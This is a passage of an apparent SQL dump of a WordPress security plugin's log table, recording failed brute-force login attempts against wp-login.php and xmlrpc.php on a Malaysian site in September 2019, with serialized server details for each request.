12:18:50',18258872,19558312,'https://bintara.com.my/xmlrpc.php',1,0,'41.76.212.181'),(25058,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"178.62.9.122\";s:11:\"REMOTE_PORT\";s:5:\"41181\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYIkO8rWzCkhZpjT3iOLRAAAAVI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568810043.2173\";s:12:\"REQUEST_TIME\";s:10:\"1568810043\";}}','notice','2019-09-18 12:34:04','2019-09-18 12:34:03',17743104,19233112,'https://bintara.com.my/wp-login.php',1,0,'178.62.9.122'),(25059,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"178.62.9.122\";s:11:\"REMOTE_PORT\";s:5:\"42663\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYIkP8rWzCkhZpjT3iOLRQAAAVM\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568810047.4354\";s:12:\"REQUEST_TIME\";s:10:\"1568810047\";}}','notice','2019-09-18 12:34:08','2019-09-18 12:34:07',18259544,19555848,'https://bintara.com.my/xmlrpc.php',1,0,'178.62.9.122'),(25060,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"142.44.146.140\";s:11:\"REMOTE_PORT\";s:5:\"55050\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYImCDYpjlmVadK6PeGtawAAAMM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568810504.8756\";s:12:\"REQUEST_TIME\";s:10:\"1568810504\";}}','notice','2019-09-18 12:41:46','2019-09-18 12:41:45',17740152,19232656,'https://bintara.com.my/wp-login.php',1,0,'142.44.146.140'),(25061,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"142.44.146.140\";s:11:\"REMOTE_PORT\";s:5:\"56170\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYImDDYpjlmVadK6PeGtbQAAAM8\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568810508.3357\";s:12:\"REQUEST_TIME\";s:10:\"1568810508\";}}','notice','2019-09-18 12:41:49','2019-09-18 12:41:48',18258960,19558288,'https://bintara.com.my/xmlrpc.php',1,0,'142.44.146.140'),(25062,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"188.165.206.114\";s:11:\"REMOTE_PORT\";s:5:\"52876\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYInp24SfF9g@8lNlxxTcQAAAEc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568810919.4363\";s:12:\"REQUEST_TIME\";s:10:\"1568810919\";}}','notice','2019-09-18 12:48:41','2019-09-18 12:48:39',17740160,19230680,'https://bintara.com.my/wp-login.php',1,0,'188.165.206.114'),(25063,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"188.165.206.114\";s:11:\"REMOTE_PORT\";s:5:\"54088\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYInqsrWzCkhZpjT3iON7QAAAVM\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568810923.0471\";s:12:\"REQUEST_TIME\";s:10:\"1568810923\";}}','notice','2019-09-18 12:48:44','2019-09-18 12:48:43',18258952,19558504,'https://bintara.com.my/xmlrpc.php',1,0,'188.165.206.114'),(25064,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"2.82.143.65\";s:11:\"REMOTE_PORT\";s:5:\"14048\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYIpaDYpjlmVadK6PeGt-AAAAM0\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568811368.2049\";s:12:\"REQUEST_TIME\";s:10:\"1568811368\";}}','notice','2019-09-18 12:56:09','2019-09-18 12:56:08',17744288,19235576,'https://bintara.com.my/wp-login.php',1,0,'2.82.143.65'),(24601,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"91.227.6.17\";s:11:\"REMOTE_PORT\";s:5:\"59742\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYDz1Pgg4cIpXyxKa54z1gAAAEQ\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568732116.7891\";s:12:\"REQUEST_TIME\";s:10:\"1568732116\";}}','notice','2019-09-17 14:55:18','2019-09-17 14:55:17',18255600,19555256,'https://bintara.com.my/xmlrpc.php',1,0,'91.227.6.17'),(24602,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"89.189.203.17\";s:11:\"REMOTE_PORT\";s:5:\"50974\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYD1REViJhUiKk@yAoenswAAAYI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568732484.2121\";s:12:\"REQUEST_TIME\";s:10:\"1568732484\";}}','notice','2019-09-17 15:01:25','2019-09-17 